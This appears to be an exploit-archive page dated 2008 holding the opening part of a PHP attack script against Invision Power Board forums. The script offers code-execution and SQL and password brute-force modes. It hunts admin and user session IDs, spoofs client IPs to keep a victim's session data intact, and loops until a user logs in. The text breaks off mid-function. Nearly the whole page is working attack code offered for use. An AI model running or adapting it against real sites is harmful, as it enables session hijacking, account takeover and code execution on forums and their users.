Invision Power Board
  Add date: 10/16/2008   Publishing date: 10/16/2008   Hits: 8
 
#!/usr/bin/php -q
<?php
error_reporting(E_ALL ^ E_NOTICE);

# yeah ... it rox (:
class ipb_spl
{
var $web;

# Entry point of the script: shows the banner, reads the command-line
# parameters and hands control to the routine selected by "attack".
#
# Parameters read through get_p(): 'attack' (second argument true),
# 'proxhost' and 'proxauth'.
# Proxy settings are pushed to $this->web only after init_global() has run
# (presumably init_global() creates $this->web -- confirm).
# Modes: 1 -> code_exec(), 2 -> bf_sql_pwd(), 3 -> bf_usr_pwd();
# any other value prints usage().
function main()
{
    $this->mhead();

    # Collect the parameters before the global setup runs
    $this->p_attack = $this->get_p('attack', true);
    $this->p_prox   = $this->get_p('proxhost');
    $this->p_proxa  = $this->get_p('proxauth');

    $this->init_global();

    # Optional proxy; credentials are only considered when a proxy host is set
    $viaProxy = (bool) $this->p_prox;

    if ($viaProxy) {
        $this->web->proxy($this->p_prox);
    }

    if ($viaProxy && $this->p_proxa) {
        $this->web->proxyauth($this->p_proxa);
    }

    # Loose (==) comparison on purpose: same matching rule a switch applies
    $mode = $this->p_attack;

    if ($mode == 1) {
        $this->code_exec();
    } elseif ($mode == 2) {
        $this->bf_sql_pwd();
    } elseif ($mode == 3) {
        $this->bf_usr_pwd();
    } else {
        $this->usage();
    }
}

function code_exec($loop=1)
{
# First loop
if( $loop == 1 )
{
$this->set_sql_param();
$this->set_sql_focus();

$this->p_acp = $this->get_p('acp');

# ACP path
if( !$this->p_acp )
{
# If the user changed the ACP directory, we can
# find it (if the "Remove ACP Link" option was not
# applied) by log in as an Admin, and then click
# on "Admin CP". This can be done with a user
# but I didn't implemented that  ;)
$this->msg('Using default ACP path: admin', 1);
$this->p_acp = 'admin';
}
else
$this->msg('Using ACP path "'.$this->p_acp.'"', 1);

# Init client headers:
# Only if we have the same IP as the targeted user (not admin),
# it resets session datas, so we try to spoof our
# IP as a random one in order to keep user's session datas while
# we bruteforce SQL fields.
$this->bypass_matches();

# Remove expired sessions ( time() - 60*60*2  =  > 2 hours )
$this->web->get($this->p_url.$this->p_acp.'/index.php?');
$this->msg('Removed all out of date admin sessions', 1);

# Cookie prefix
$this->get_cprefix();
}

# Admin session ?
$this->msg('Trying to find an admin session id', 0);

# Got one :]
if( $this->get_admin_sess() )
{
$this->s_admin = true;
$this->s_sess  = $this->data['a_sess_id'];
$this->a_url   = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess;
}

# Nothing special
else
{
$this->s_admin = false;
$this->msg('No admin session id found', -1);
}

# User session ?
if( !$this->s_sess )
{
$this->msg('Trying to find a user session id', 0);

# Yep
if( $this->get_user_sess() )
$this->s_sess = $this->data['u_sess_id'];

# F0ck
else
{
$this->msg('No user session id found', -1);
$this->msg('Admin session > 2 hours or user logged out', 0);
$this->msg('Keeping trying until the user connects', 0);
$this->msg('Entering loop #'.$loop.' ...', 0);
$this->code_exec(++$loop);
}
}

$this->msg('Getting security options', 0);

# Security options
$this->get_sec_options();

# IP filter ?
if( $this->conf['ip'] === '1' )

 
